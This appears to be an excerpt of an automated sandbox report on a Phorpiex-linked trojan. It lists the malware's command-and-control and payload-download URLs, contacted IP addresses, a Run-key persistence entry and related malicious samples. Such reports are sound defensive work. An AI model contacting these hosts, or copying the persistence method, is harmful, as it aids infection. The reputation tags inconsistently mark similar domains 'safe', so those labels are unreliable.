                                                                                                                                                                                                    http://fifiehsueuufidhfi.com/tldr.php?newinsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://ddos.dnsnb8.net:799/cj//k3.rar:XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://afeifieuuufufufuf.info/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://eoroooskfogihisrg.in/tldr.php?newinf=15i%winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://ddos.dnsnb8.net:799/cj//k1.rark8XBVdJN.exe, 00000001.00000003.2333120316.00000000011DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://afeifieuuufufufuf.com/tldr.php?newinf=1jkwinsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://srndndubsbsifurfd.net/tldr.php?newinf=1Awinsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://afeifieuuufufufuf.ru/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://aiiaiafrzrueuedur.com/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://eiifngjfksisiufjf.net/tldr.php?newinf=14Awinsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://iuirshriuisruruuf.su/tldr.php?newinf=1sowinsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://fuaiuebndieufeufu.net/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://ddos.dnsnb8.net:799/cj//k4.rarTXBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: phishing
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://nnososoosjfeuhueu.in/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://iuirshriuisruruuf.net/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://afeifieuuufufufuf.net/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://fifiehsueuufidhfi.su/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://aiiaiafrzrueuedur.com/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://www.smartsharesystems.com/SciTE.exe.1.drfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://nousiieiffgogogoo.su/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.scintilla.orgSciTE.exe.1.drfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://noeuaoenriusfiruu.net/tldr.php?newinf=1=BZwinsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://fuaiuebndieufeufu.su/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://srndndubsbsifurfd.su/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://aiiaiafrzrueuedur.net/tldr.php?newinf=10B%winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://fuaiuebndieufeufu.ru/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://slpsrgpsrhojifdij.net/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://afeifieuuufufufuf.com/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://srndndubsbsifurfd.in/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://aiiaiafrzrueuedur.biz/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://ddos.dnsnb8.net:799/cj//k2.rarh?pXBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.baanboard.comSciTE.exe.1.drfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                    185.215.113.66
                                                                                                                                                                                                    aiiaiafrzrueuedur.netPortugal
                                                                                                                                                                                                    206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                    34.218.204.173
                                                                                                                                                                                                    eiifngjfksisiufjf.bizUnited States
                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                    208.100.26.245
                                                                                                                                                                                                    ssofhoseuegsgrfnj.inUnited States
                                                                                                                                                                                                    32748STEADFASTUSfalse
                                                                                                                                                                                                    199.59.243.226
                                                                                                                                                                                                    86537.BODIS.COMUnited States
                                                                                                                                                                                                    395082BODIS-NJUSfalse
                                                                                                                                                                                                    44.213.104.86
                                                                                                                                                                                                    eiifngjfksisiufjf.inUnited States
                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                    92.63.197.48
                                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                                    204655NOVOGARA-ASNLfalse
                                                                                                                                                                                                    44.221.84.105
                                                                                                                                                                                                    iuirshriuisruruuf.inUnited States
                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                    170.39.226.155
                                                                                                                                                                                                    ssofhoseuegsgrfnu.ruReserved
                                                                                                                                                                                                    139776PETRONAS-BHD-AS-APPetroliamNasionalBerhadMYfalse
                                                                                                                                                                                                    13.251.16.150
                                                                                                                                                                                                    slpsrgpsrhojifdij.netUnited States
                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                    54.244.188.177
                                                                                                                                                                                                    noeuaoenriusfiruu.bizUnited States
                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                    74.119.239.234
                                                                                                                                                                                                    afeifieuuufufufuf.comUnited States
                                                                                                                                                                                                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                                                                                    92.246.89.93
                                                                                                                                                                                                    ssofhoseuegsgrfnj.suRussian Federation
                                                                                                                                                                                                    49558LIVECOMM-ASRespublikanskayastr3k6RUfalse
                                                                                                                                                                                                    18.141.10.107
                                                                                                                                                                                                    nousiieiffgogogoo.netUnited States
                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                    Analysis ID:1481855
                                                                                                                                                                                                    Start date and time:2024-07-25 15:12:07 +02:00
                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                    Overall analysis duration:0h 10m 2s
                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                    Number of analysed new started processes analysed:18
                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                    Sample name:LisectAVT_2403002B_290.exe
                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                    Classification:mal100.spre.troj.evad.winEXE@27/28@111/13
                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                    • Successful, ratio: 94%
                                                                                                                                                                                                    • Number of executed functions: 96
                                                                                                                                                                                                    • Number of non-executed functions: 278
                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                    • VT rate limit hit for: LisectAVT_2403002B_290.exe
                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                    09:13:29API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                    09:14:11API Interceptor7142790x Sleep call for process: winsvcs.exe modified
                                                                                                                                                                                                    15:13:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Services C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                    15:13:36AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Services C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                    15:13:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Services C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    185.215.113.663YHDfHLvo4.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                                    • 185.215.113.66/_2
                                                                                                                                                                                                    SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                                    • 185.215.113.66/6
                                                                                                                                                                                                    SecuriteInfo.com.Trojan.DownLoader46.2135.7325.13890.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                                    • 185.215.113.66/_3
                                                                                                                                                                                                    BFP2Kvubpo.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                                    • 185.215.113.66/_3
                                                                                                                                                                                                    WI6a5vSCOb.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                                    • 185.215.113.66/_3
                                                                                                                                                                                                    xJd712XMG6.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                                    • 185.215.113.66/6
                                                                                                                                                                                                    lRT1FK9PcL.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                                    • 185.215.113.66/_1
                                                                                                                                                                                                    5qO4CoKcQo.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                                    • 185.215.113.66/_2
                                                                                                                                                                                                    SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                                    • 185.215.113.66/_2
                                                                                                                                                                                                    I7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                                    • 185.215.113.66/6
                                                                                                                                                                                                    34.218.204.173Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • eveningbecome.net/index.php
                                                                                                                                                                                                    gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • eveningbecome.net/index.php
                                                                                                                                                                                                    Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • eveningbecome.net/index.php
                                                                                                                                                                                                    gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • eveningbecome.net/index.php
                                                                                                                                                                                                    208.100.26.245http://g29316481580.coGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • g29316481580.co/favicon.ico
                                                                                                                                                                                                    http://a.5aa28fd0288f8ce3733a7c9fc585ac36.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • a.5aa28fd0288f8ce3733a7c9fc585ac36.com/favicon.ico
                                                                                                                                                                                                    HrONRdSlYf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • weatherbicycle.net/index.php
                                                                                                                                                                                                    spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                    • lyvyxor.com/login.php
                                                                                                                                                                                                    i0PNkJ8um8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • breadmayor.net/index.php
                                                                                                                                                                                                    Mfd1iISnqC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • streettoward.net/index.php
                                                                                                                                                                                                    oO4jogbesK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • streettoward.net/index.php
                                                                                                                                                                                                    vtS0cwx3fg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • streettoward.net/forum/search.php?email=ballaviorica@drballa.eu&method=post
                                                                                                                                                                                                    CMO4VDTx2J.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • husbandnothing.net/index.php
                                                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • www.f5ds1jkkk4d.info/t_100_v400/?rnd=1519662906&id=632934364559
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    ddos.dnsnb8.netLisectAVT_2403002B_293.exeGet hashmaliciousBdaejecBrowse
                                                                                                                                                                                                    • 44.221.84.105
                                                                                                                                                                                                    LisectAVT_2403002B_296.exeGet hashmaliciousBdaejec, BlackMoonBrowse
                                                                                                                                                                                                    • 44.221.84.105
                                                                                                                                                                                                    LisectAVT_2403002B_301.exeGet hashmaliciousBdaejec, GCleanerBrowse
                                                                                                                                                                                                    • 44.221.84.105
                                                                                                                                                                                                    LisectAVT_2403002B_309.exeGet hashmaliciousBdaejec, FormBookBrowse
                                                                                                                                                                                                    • 44.221.84.105
                                                                                                                                                                                                    LisectAVT_2403002B_303.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                                                                                                                                                                    • 44.221.84.105
                                                                                                                                                                                                    LisectAVT_2403002B_302.exeGet hashmaliciousBdaejec, EmotetBrowse
                                                                                                                                                                                                    • 44.221.84.105
                                                                                                                                                                                                    LisectAVT_2403002B_307.exeGet hashmaliciousBdaejec, GhostRat, NitolBrowse
                                                                                                                                                                                                    • 44.221.84.105
                                                                                                                                                                                                    LisectAVT_2403002B_308.exeGet hashmaliciousBdaejec, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                    • 44.221.84.105
                                                                                                                                                                                                    LisectAVT_2403002B_315.exeGet hashmaliciousBdaejecBrowse
                                                                                                                                                                                                    • 44.221.84.105
                                                                                                                                                                                                    LisectAVT_2403002B_324.exeGet hashmaliciousBdaejecBrowse
                                                                                                                                                                                                    • 44.221.84.105
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    AMAZON-02USRe_ Q22689 - 07.24.2024_Conduit Construction Network Ltd_Today.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 34.252.40.201
                                                                                                                                                                                                    LETTER.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 18.239.83.16
                                                                                                                                                                                                    http://www.cabrerallamas.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 18.158.75.66
                                                                                                                                                                                                    http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 108.156.64.41
                                                                                                                                                                                                    phish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 18.245.86.89
                                                                                                                                                                                                    LisectAVT_2403002B_404.dllGet hashmaliciousRamnitBrowse
                                                                                                                                                                                                    • 18.239.83.98
                                                                                                                                                                                                    phish_alert_sp2_2.0.0.0 (27).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 18.239.18.33
                                                                                                                                                                                                    LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • 18.163.247.76
                                                                                                                                                                                                    Ewhite Replay VM .docxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                                                                    • 13.227.219.97
